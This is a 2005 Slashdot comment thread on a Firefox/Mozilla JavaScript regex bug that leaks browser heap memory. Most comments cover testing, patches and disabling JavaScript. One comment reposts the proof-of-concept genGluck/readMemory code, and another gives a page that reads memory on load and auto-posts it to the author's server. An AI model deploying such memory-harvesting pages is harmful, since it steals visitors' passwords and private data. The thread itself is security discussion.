3. Re:Definately a big hole by Narchie+Troll · 2005-04-04 18:33 · Score: 1
  
  1. I'm not too worried about Secunia noticing what porn sites I've been browsing.
  2. The example doesn't send any data to the server anyway. The only person seeing your data in this particular example is you.
IE & Opera Unaffected by TFGeditor · 2005-04-04 08:28 · Score: 4, Interesting

Just for grins, I tried it wi IE and Opera. Just threw up a bunch of XXXXX in the text box.

Clearly a Mozilla-specific problem.

--
Ignorance is curable, stupid is forever.
1. Re:IE & Opera Unaffected by MoogMan · 2005-04-04 09:48 · Score: 2, Funny
  
  Well yeah, otherwise the headline would be
  
  "Mozilla / Firefox / IE / Opera Memory Exposure Vulnerability"
  
  wouldn't it?
2. Re:IE & Opera Unaffected by TFGeditor · 2005-04-04 09:54 · Score: 1
  
  Yes, if you assume they tested the other browsers. I could have missed it, but I did not see other browsers mentioned in TFA as excluded from the vulnerability, so I tried it for myself, and thought other would find it interesting.
  
  Problem?
  
  --
  Ignorance is curable, stupid is forever.
3. Re:IE & Opera Unaffected by Zork+the+Almighty · 2005-04-04 10:07 · Score: 4, Insightful
  
  No, it would be "New Critical IE Vulnerability" and it would be on the front page...
  
  --
  
  In Soviet America the banks rob you!
4. Re:IE & Opera Unaffected by crisco · 2005-04-04 15:28 · Score: 1
  
  anyone try this in Linux?
  I'm just getting Xs even after hammering on the link for a bit.
  Browser is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2)
  I guess that even since this is version 1.0.2 that someone in Debian or Ubuntu backported the fix and it was available in my last update.
  
  --
  Bleh!
5. Re:IE & Opera Unaffected by qqtortqq · 2005-04-04 17:39 · Score: 1
  
  Yeah, the vulnerability is present in my Linux version of Mozilla 1.7.5.
6. Re:IE & Opera Unaffected by LittleBigLui · 2005-04-04 18:02 · Score: 1
  
  firefox-bin-1.0.2 on gentoo is vulnerable.
  
  Don't beat me for using -bin.
  
  --
  Free as in mason.
7. Re:IE & Opera Unaffected by Ciaran_H · 2005-04-04 18:49 · Score: 1
  
  I'm using Firefox 1.0.2 on Gentoo from source and it's vulnerable as well.
Simple JavaScript by duerra · 2005-04-04 08:30 · Score: 2, Insightful

It works if you don't click quickly and repeatedly in Firefox.

It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.

function genGluck(str){
var x = str;
var rx=/end/i;
x = x.replace(rx,function($1){
$1.match(rx);
return "";
});
x = x.replace(/^end/,"");
return x;
}

function readMemory()
{
var mem = genGluck("{10,246 "X's" here}end");

mem = mem.replace(/[^\.\\\:\/\'\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

document.getElementById('result').value = mem;

}

--
A community-oriented lyrics site
Just a clarification by Anonymous Coward · 2005-04-04 08:35 · Score: 0

Javascript anywhere on the page executes as it is parsed.
1. Re:Just a clarification by ChipMonk · 2005-04-05 09:38 · Score: 1
  
  JavaScript in a callback function (i.e. "onmouseover" event) does not execute until invoked by a user event. RTFA for an example.
No problem here by jkerman · 2005-04-04 08:38 · Score: 2, Informative

just displays all "XXXXXXXXXXX" for me.

using OSX with nightly builds auto-downloaded with FireFix (which is a really neat app)
1. Re:No problem here by dougmc · 2005-04-04 09:18 · Score: 2, Funny
  
  just displays all "XXXXXXXXXXX" for me.
  Hey! How did it find my password on your browser?!@?!@$?!
Ok, confirmed by cjsnell · 2005-04-04 08:44 · Score: 4, Informative

You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:
<HTML> <HEAD> <TITLE>Nasty Demo</TITLE> </HEAD> <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();"> <SCRIPT language="JavaScript"> function genGluck(str){ var x = str; var rx=/end/i; x = x.replace(rx,function($1){ $1.match(rx); return ""; }); x = x.replace(/^end/,""); return x; } function readMemory() {

First peice of readMemory() removed to satisfy Slashdot crapfilter

mem = mem.replace(/[^\.\\\:\/\'\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " "); document.nasty.result.value = mem; document.nasty.submit(); } </SCRIPT> <FORM METHOD=POST NAME='nasty'> <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'> </FORM> <BR><BR> </BODY> </HTML> <%args> $result => '' </%args> <%init> open(OUTFILE,'>>/tmp/outfile'); print $result OUTFILE; close(OUTFILE); </%init>
Mod parent something else .. by Anonymous Coward · 2005-04-04 08:45 · Score: 0

who the hell moded this flamebait.
Please explain to me why this is flamebait could you...
All he is doing is expanding on the problem and asking for more details ,?

-mike
1. Re:Mod parent something else .. by FidelCatsro · 2005-04-04 08:48 · Score: 1
  
  Hm well i did not want to awnser myself but yes i agree , i do not see why my post is flamebait , i am not bashing firefox ... I have used it since the early days and love the browser dearly ... and i do not think it is wrong to point out that this is a bug compared to IEs active X being an insecure feature..
  (I do not care about the karma , my karma is maxed out and this wont hurt it any)
  
  FCat
  
  --
  The only things certain in war are Propaganda and Death. You can never be sure which is which though
2. Re:Mod parent something else .. by Zareste · 2005-04-07 19:02 · Score: 1
  
  Nevar fear! I had the honor of meta-moderating the guy who marked it ;)
  
  --
  I am NOT a number! I am a - oh wait, I'm number 761710. Look! 761710!
Safari slightly vulnerable? by inio · 2005-04-04 08:49 · Score: 2, Insightful

In addition to a bunch of Xs, Safari threw a little piece of Javascript code not originating on the source page into the end of the text box. Looks light it might be a little vulnerable too.
1. Re:Safari slightly vulnerable? by LincolnQ · 2005-04-04 09:30 · Score: 2, Insightful
  
  No, Safari doesn't support Javascript's function objects (lambdas?), which the test seems to use. I don't know if rewriting the test in a different way would make it work, but I doubt it. It appears to be a flaw in the regular expression engine in Gecko.
Download the latest patched version right here by OmegaGX · 2005-04-04 08:50 · Score: 3, Informative

Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nig htly/latest-trunk/firefox-1.0+.en-US.win32.install er.exe
I just used it and I am not vulnerable: all I see are lot's of X's just like in IE.
1. Re:Download the latest patched version right here by tracemonkey · 2005-04-04 21:11 · Score: 1
  
  Is there a fix for this that's also in the 1.02 version?
Access to firefox heap, not entire system by jgoemat · 2005-04-04 08:56 · Score: 2, Insightful

This exploits a vulnerability in Mozilla/FireFox's javascript engine. It allows the javascript code on the web page to access an arbitrary amount of heap data of the FireFox application. The locations in memory and the size of the block returned cannot be set, so you basically get random data from FireFox's heap. Most likely under a kilobyte of data will be returned, and it will most likely be data from some web page or file you downloaded.
This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.
This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.
The only way to be save right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.
1. Re:Access to firefox heap, not entire system by Anonymous Coward · 2005-04-04 09:30 · Score: 1, Informative
  
  Seeing as many sites (including /.) require javascript to use, this really isn't a good option.
  
  This is bullshit. Lots of sites use Javascript, but very few sites require Javascript. Slashdot is one example of a website that uses Javascript without requiring it.
  
  So ignore the parent, go ahead and switch Javascript off. If you find a website that is broken, email a complaint, and, if you trust the website, enable Javascipt for that one website, and switch it off again afterwards.
  
  As far as I can tell, the #1 problem with switching Javascript off is clueless web developers doing <a href="#" onclick... for popups which is completely unnecessary and ignorant.
2. Re:Access to firefox heap, not entire system by TheGratefulNet · 2005-04-04 10:38 · Score: 2, Informative
  
  slash requires js?
  
  since when?
  
  I disable js for all but 1 or 2 sites that I visit.
  
  prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.
  
  but you don't need js for slash. you never have.
  
  --
  
  --
  "It is now safe to switch off your computer."
3. Re:Access to firefox heap, not entire system by TheGratefulNet · 2005-04-04 11:45 · Score: 1
  
  slightly offtopic, but: is there any firefox plugin that allows you to map which sites NEED jscript on (and then when you visit those sites, it auto 'presses' the jscript enable button)? similarly, when you switch to a tab or window that has a site that is mapped (manually, by you, in some config file) as NOT needing jscript, it disables it?
  
  I'd LOVE to have that. there are only a handful of sites that I use that NEED js. most don't. and in some sites, its BAD to have js on (ie, I get more ads with js than I do with simple static html - so some sites are better 'experienced' with js off).
  
  anyone know if there is any way on a per-site basis to have js on and off?
  
  --
  
  --
  "It is now safe to switch off your computer."
4. Re:Access to firefox heap, not entire system by Anonymous Coward · 2005-04-04 12:17 · Score: 0
  
  Sadly, while virtually every other browser allows you to have per-site Javascript settings (even Internet Explorer!), it seems the Firefox developers consider it to be unnecessary.
  
  Search this page for "per-URL" to get some relevant information.
5. Re:Access to firefox heap, not entire system by ralphdaugherty · 2005-04-04 15:52 · Score: 1
  
  The only way to be save right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.
  
  The /. site doesn't require Javascript to work as far as reading and making posts. I keep it turned off all the time except when filling out forms or such where it is useful to me.
  
  rd
6. Re:Access to firefox heap, not entire system by spitzak · 2005-04-04 17:08 · Score: 1
  
  Has anybody looked into making a "guess what the JavaScript does" plugin? It would examine the JavaScript on a button or link and take a guess as to what the URL it is trying to open is, and open it.
  
  Certainly I have been able to guess the URL by looking at one-line samples of Javascript. Is this possible in general? Would it be good enough to allow you to leave javascript off?
7. Re:Access to firefox heap, not entire system by Anonymous Coward · 2005-04-04 21:32 · Score: 0
  
  So what happens when it's code containing something like "if prompt('Are you sure you want to delete this email?') location.href = 'delete.php?id=x';"? (I know GET is horrible for stuff like this, but people use it anyway).
8. Re:Access to firefox heap, not entire system by spitzak · 2005-04-05 06:09 · Score: 1
  
  My guess is that it would go to the delete page without asking the question. However an intelligent one may be able to detect that it is too complex, and go to a page saying "it's trying to execute this javascript and here are my guesses as to the URL's it's trying to open "
comma by Anonymous Coward · 2005-04-04 09:39 · Score: 5, Insightful

which can be exploited by any web site to read all memory, which the browser process has access to
I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between
read all memory, which the browser process has access to

and
read all memory which the browser process has access to

Is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.
1. Re:comma by Dachannien · 2005-04-04 10:29 · Score: 1
  
  According to the grammar checker in MS Word, the second example is still incorrect, and should instead say this:
  
  "read all memory that the browser process has access to"
  The only way to pacify MS Word, if you insist upon using "which", is to put the comma before it.
  
  Of course, this is all to say nothing of ending the sentence with a preposition, but that hardly has the impact noted by the parent ;)
2. Re:comma by EGaming · 2005-04-04 11:31 · Score: 1
  
  I think the Simpsons said it best when the family goes to the best lawyer in town and hands him a coupon:
  Coupon: "No money down!"
  Hutz: "What? This thing is all screwed up"
  [hutz writes on it]
  Coupon now reads: "No. [M]oney down!"
3. Re:comma by kwoff · 2005-04-06 03:50 · Score: 1
  
  The Word grammar checker is right. You're supposed to use "that" there.
doesn't show anything but XXXXs for me by dalutong · 2005-04-04 09:50 · Score: 1

maybe my ubuntu hoary system is patched? or this doesn't affect linux?

--

What comes first, finding a teacher or becoming a student?
1. Re:doesn't show anything but XXXXs for me by crisco · 2005-04-04 15:42 · Score: 1
  
  Yeah I noticed same thing and posted about it somewhere here.
  Browser string is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2), the 4/4/05 makes me think a fix was backported for us. Gives me a little more happiness about Ubuntu and Debian, though I'm sure it has made its way into other distributions as well.
  
  --
  Bleh!
Re:MOD PARENT DOWN! by Anonymous Coward · 2005-04-04 10:21 · Score: 0

"This "gator" is trolling like a cumsnake trolls for cum."

Good job proving his point, jack ass.
CRASH? by EGaming · 2005-04-04 11:04 · Score: 1

Firefox Version 1.02: Clicking the link repeatedly and quickly causes a crash. Any others have the same thing happen? If so, this could be a bigger problem than just a security hole.
1. Re:CRASH? by srstoneb · 2005-04-04 11:11 · Score: 2, Interesting
  
  The first time I tried it, it didn't merely crash Firefox. When I clicked the "test now" link my entire system immediately died, and began rebooting. After reboot, the test now works (and confirms my vulnerability).
  
  Windows 98 SE, Firefox 1.0.2.
2. Re:CRASH? by EGaming · 2005-04-04 11:17 · Score: 1
  
  whole system crash? Haven't had any of those since ME. I suspect 98SE. Something is wiggy with the javascript. I've never really liked it and this proves that Java is not the cure-all to every application need.
3. Re:CRASH? by DylanQuixote · 2005-04-04 14:29 · Score: 1
  
  Javascript is not java;
  Javascript does not have the Java security model.
  
  Java does suck, but for other reasons...
Firefox's autoupdate feature needs serious work. by Guspaz · 2005-04-04 12:12 · Score: 1

I'm running Firefox 1.0.1. I'm STILL waiting for the updater to report that 1.0.2 is available. Even if I manually tell it to check for updates, it says none are available.

If they haven't even put 1.0.2 onto the autoupdater, how long will it be before patches like this make it out? It's pretty stupid.
Other Gecko-based browsers affected as well. by Lazyhound · 2005-04-04 14:30 · Score: 2, Insightful

K-Meleon has the same problem, only it probably won't be patched for months, forcing me back to Firefox. Bah.
disable javascript? by imess · 2005-04-04 15:31 · Score: 0, Redundant

would it be a sufficient workaround?
1. Re:disable javascript? by imess · 2005-04-04 15:43 · Score: 0, Redundant
  
  argh didn't read thru...
Re:Firefox's autoupdate feature needs serious work by mirrorful · 2005-04-05 01:34 · Score: 1

I'm pretty sure they have put 1.0.2 on the autoupdater...
No shock at all by TheLink · 2005-04-05 04:07 · Score: 1

Whether it's open source or not doesn't mean much with respect to security.

If you can't or don't want to do an audit of the source, it's usually safe to assume it's probably just as bad as whatever software the Mozilla programmers used to write.

A good tree produces good fruit. A bad tree produces bad fruit. Sure you can get a tree to change, but it often takes years (see BIND, Sendmail).

The fact that Mozilla crashes regularly (but not so predictably) on normal use (well at least my normal use ;) ) means there are a fair number of not that obscure security bugs left to be found.

If it crashed predictably in only a few scenarios, then there are significantly fewer obvious bugs left to fix.

I've already said something similar about Mozilla before. (it's modded -1 for some reason ;) ).

Anyway it looks like I've been vindicated. Within 2 weeks too ;).

I used to work in the IT security line. I think I've learnt at least a thing or two...

Here's a free tip: Run your browser as a different user. You can do that in Linux/*BSD and Windows XP/2000. Use google and figure out the implementation details.

Your browser data will still be vulnerable to attackers, but if you set up the permissions correctly, the data and documents owned by your normal user account will be safe.

If you are paranoid you can also use a different browser user for different security levels/realms (e.g. mozbank for banking, mozprivate for other important stuff, moznormal for normal sites, mozother for unknown sites ).

If you do that try to have different browser schemes/colours too. That way it's easier to know when you're using the wrong browser for the wrong site ;).

Also may wish to do stuff like: have the bank browser's homepage as the bank site, and have it only allow javascript etc to be on for the bank URLs - other urls just don't get javascript and other stuff active.

Sure it's a bit of work to set it up, but once you've got it setup it's not so hard - think of the different browsers as separate apps.

Also make your GUI preferences a slightly different colour from the default. So if a attacker plants a trick window, hopefully it won't match and you'll notice.

This won't protect you from GUI overflow bugs or "shatter" attacks in the case of Windows. But I believe hackers will find attacking the other users easier.

I personally use a virtual machine to browse unknown sites, or untrusted sites that require javascript/flash. Just a click of a button and the virtual machine is back to a known state.

That said I've managed to crash vmware. Just a DoS - (the vmware people that I emailed said they didn't think it's exploitable). When I've more time maybe I'll go check it out.
--
- Too many replies beneath your current threshold
Re:Firefox's autoupdate feature needs serious work by Guspaz · 2005-04-05 14:26 · Score: 1

I'm still not seeing it. If it has already been released, then there is a bug at work. Either way, something has to be fixed.